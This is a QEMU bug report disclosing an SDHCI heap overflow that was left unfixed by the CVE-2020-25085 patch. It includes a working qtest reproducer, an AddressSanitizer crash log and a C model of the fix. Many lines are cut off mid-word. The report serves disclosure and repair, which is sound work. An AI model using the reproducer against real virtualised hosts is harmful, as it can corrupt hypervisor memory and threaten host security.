QEMU: Heap Overflow vulnerability in SDHCI Component
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| QEMU | Fix Released | Undecided | Philippe Mathieu-Daudé | |
Bug Description
Hello, I want to report a QEMU vulnerability in the SDHCI component. This is an integer overflow bug that leads to an OOB read/write in the heap, which can happen in sdhci_do_adma or sdhci_sdma_
This is caused when, in the middle of an unfinished transfer, blksize can change, but data_count still holds the last offset into fifo_buffer from the last transfer. We change blksize to zero, then in the next transfer dma_memory_
This bug is recorded as CVE-2020-25085, but the fix is not complete and does not fix the root cause of the bug.
Reproducer:
```text
outl 0xcf8 0x80001010
outl 0xcfc 0xd7055dba
outl 0xcf8 0x80001003
outl 0xcfc 0x86b1d733
write 0x00 0x1 0x29
write 0x02 0x1 0x10
write 0x08 0x1 0x39
writeb 0xd7055d2b 0x5e
writel 0xd7055d2c 0xed7d735
writew 0xd7055d30 0x126e
writeb 0xd7055d32 0x84
writel 0xd7055d24 0xd7346e01
writew 0xd7055d28 0x3bd7
writeb 0xd7055d2a 0x1
writeb 0xd7055d05 0x2c
writew 0xd7055d06 0x5c4
writeb 0xd7055d0c 0x21
writew 0xd7055d0e 0x846e
writel 0xd7055d04 0x260000
writew 0xd7055d08 0x0
writeb 0xd7055d0a 0x6d
writeb 0xd7055d0c 0x31
clock_step
EOF
```
```text
➜ x86_64-softmmu git:(master) ✗ ./qemu-
==410717==WARNING: ASan doesn't fully support makecontext/
[I 1609122395.789698] OPENED
qemu-system-x86_64: -drive if=sd,index=
[R +0.037381] outl 0xcf8 0x80001010
[S +0.037436] OK
OK
[R +0.037470] outl 0xcfc 0xd7055dba
[S +0.037510] OK
OK
[R +0.037531] outl 0xcf8 0x80001003
[S +0.037549] OK
OK
[R +0.037571] outl 0xcfc 0x86b1d733
[S +0.039830] OK
OK
[R +0.039882] write 0x00 0x1 0x29
[S +0.040364] OK
OK
[R +0.040401] write 0x02 0x1 0x10
[S +0.040428] OK
OK
[R +0.040449] write 0x08 0x1 0x39
[S +0.040472] OK
OK
[R +0.040491] writeb 0xd7055d2b 0x5e
[S +0.040530] OK
OK
[R +0.040550] writel 0xd7055d2c 0xed7d735
[S +0.040575] OK
OK
[R +0.040594] writew 0xd7055d30 0x126e
[S +0.040620] OK
OK
[R +0.040638] writeb 0xd7055d32 0x84
[S +0.040658] OK
OK
[R +0.040676] writel 0xd7055d24 0xd7346e01
[S +0.040697] OK
OK
[R +0.040715] writew 0xd7055d28 0x3bd7
[S +0.040738] OK
OK
[R +0.040756] writeb 0xd7055d2a 0x1
[S +0.040779] OK
OK
[R +0.040797] writeb 0xd7055d05 0x2c
[S +0.040819] OK
OK
[R +0.040840] writew 0xd7055d06 0x5c4
[S +0.040862] OK
OK
[R +0.040882] writeb 0xd7055d0c 0x21
[S +0.040907] OK
OK
[R +0.040927] writew 0xd7055d0e 0x846e
[S +0.041026] OK
OK
[R +0.041054] writel 0xd7055d04 0x260000
[S +0.041115] OK
OK
[R +0.041139] writew 0xd7055d08 0x0
=======
==410717==ERROR: AddressSanitizer: heap-buffer-
WRITE of size 786432 at 0x615000024180 thread T0
#0 0x7fe40cb7457c (/lib/x86_
#1 0x55f804942120 in flatview_
#2 0x55f8049423dd in flatview_read ../../softmmu/
#3 0x55f804942581 in address_
#4 0x55f804942800 in address_space_rw ../../softmmu/
#5 0x55f8038d6a92 in dma_memory_
#6 0x55f8038d6adf in dma_memory_rw /home/n0p/
#7 0x55f8038d6b17 in dma_memory_read /home/n0p/
#8 0x55f8038e47d9 in sdhci_do_adma ../../hw/
#9 0x55f8038e6081 in sdhci_data_transfer ../../hw/
#10 0x55f8038e694c in sdhci_resume_
#11 0x55f8038e9227 in sdhci_write ../../hw/
#12 0x55f804856869 in memory_
#13 0x55f804856cf4 in access_
#14 0x55f804863f28 in memory_
#15 0x55f8049419ce in flatview_
#16 0x55f804941da4 in flatview_write ../../softmmu/
#17 0x55f804942724 in address_space_write ../../softmmu/
#18 0x55f804a9bee3 in qtest_process_
#19 0x55f804aa0dea in qtest_process_inbuf ../../softmmu/
#20 0x55f804aa0edb in qtest_read ../../softmmu/
#21 0x55f804ffb687 in qemu_chr_
#22 0x55f804ffb731 in qemu_chr_be_write ../../chardev/
#23 0x55f804fe5369 in fd_chr_read ../../chardev/
#24 0x55f804f9b2dd in qio_channel_
#25 0x7fe40c548e8d in g_main_
#26 0x55f80540b38e in glib_pollfds_poll ../../util/
#27 0x55f80540b56f in os_host_
#28 0x55f80540b871 in main_loop_wait ../../util/
#29 0x55f80478602b in qemu_main_loop ../../softmmu/
#30 0x55f8038091c9 in main ../../softmmu/
#31 0x7fe409dc80b2 in __libc_start_main (/lib/x86_
#32 0x55f8038090dd in _start (/home/
0x615000024180 is located 0 bytes to the right of 512-byte region [0x615000023f80
allocated by thread T0 here:
#0 0x7fe40cbe6dc6 in calloc (/lib/x86_
#1 0x7fe40c54ed30 in g_malloc0 (/lib/x86_
#2 0x55f8040cd37b in sdhci_pci_realize ../../hw/
#3 0x55f80411c6f5 in pci_qdev_realize ../../hw/
#4 0x55f804fc7834 in device_set_realized ../../hw/
#5 0x55f804f8002c in property_set_bool ../../qom/
#6 0x55f804f7a840 in object_property_set ../../qom/
#7 0x55f804f83419 in object_
#8 0x55f804f7ae44 in object_
#9 0x55f804fc417a in qdev_realize ../../hw/
#10 0x55f803da8bb7 in qdev_device_add ../../softmmu/
#11 0x55f8047f5408 in device_init_func ../../softmmu/
#12 0x55f8053d3644 in qemu_opts_foreach ../../util/
#13 0x55f8047fc593 in qemu_create_
#14 0x55f8047fc6fa in qmp_x_exit_
#15 0x55f804801c8e in qemu_init ../../softmmu/
#16 0x55f8038091c4 in main ../../softmmu/
#17 0x7fe409dc80b2 in __libc_start_main (/lib/x86_
SUMMARY: AddressSanitizer: heap-buffer-
```
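To make the root cause concrete, here is an added, simplified C model (not QEMU's code) of the bookkeeping the report describes: a 512-byte fifo_buffer, a resume offset data_count left behind by an unfinished transfer, and a guest-written blksize register. naive_chunk_len shows the unsigned wrap when blksize drops below data_count; checked_dma_step and write_blksize are one assumed way to restore the invariant, not QEMU's actual patch.

```c
/* Added illustrative model, not QEMU's code: a 512-byte fifo_buffer, a resume
 * offset (data_count) left over from an unfinished block transfer, and a
 * guest-written blksize register, as described in the report above. */
#include <stdint.h>
#include <string.h>

#define FIFO_SIZE 512u
struct sdhci_model {
    uint8_t  fifo_buffer[FIFO_SIZE];
    uint32_t data_count;   /* bytes of the current block already moved */
    uint16_t blksize;      /* block size register, low 12 bits used */
};

/* Naive resume arithmetic: trusts that blksize still describes the block that
 * data_count indexes into. With blksize 0 and data_count > 0, end - begin
 * wraps to a huge DMA length: the heap-buffer overflow ASan reports above. */
uint32_t naive_chunk_len(const struct sdhci_model *s, uint32_t length)
{
    uint32_t block_size = s->blksize & 0xfff;
    uint32_t begin = s->data_count;
    uint32_t end = (length + begin < block_size) ? length + begin : block_size;
    return end - begin;
}

/* Hardened resume step: copies only a chunk that starts at or before the current
 * block size and ends inside fifo_buffer; returns bytes copied, or -1 on a stale offset or bogus size. */
int32_t checked_dma_step(struct sdhci_model *s, const uint8_t *src, uint32_t length)
{
    uint32_t block_size = s->blksize & 0xfff;
    uint32_t begin = s->data_count;
    if (block_size == 0 || begin > block_size || block_size > FIFO_SIZE) {
        return -1;
    }
    uint32_t room = block_size - begin;      /* cannot wrap: begin <= block_size */
    uint32_t n = length < room ? length : room;
    memcpy(&s->fifo_buffer[begin], src, n);
    s->data_count = (begin + n == block_size) ? 0 : begin + n;  /* block done: rewind */
    return (int32_t)n;
}

/* Register-write side of the same invariant (one fix strategy assumed here, not
 * QEMU's exact patch): a changed block size invalidates the resume offset. */
void write_blksize(struct sdhci_model *s, uint16_t value)
{
    uint16_t old = s->blksize;
    s->blksize = value & 0xfff;
    if (s->blksize != old) {
        s->data_count = 0;
    }
}
```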
Information type: Private Security → Public Security
Please don't report security issues as private bugs here, see https://www.qemu.org/contribute/security-process/ for QEMU's security process. Thanks.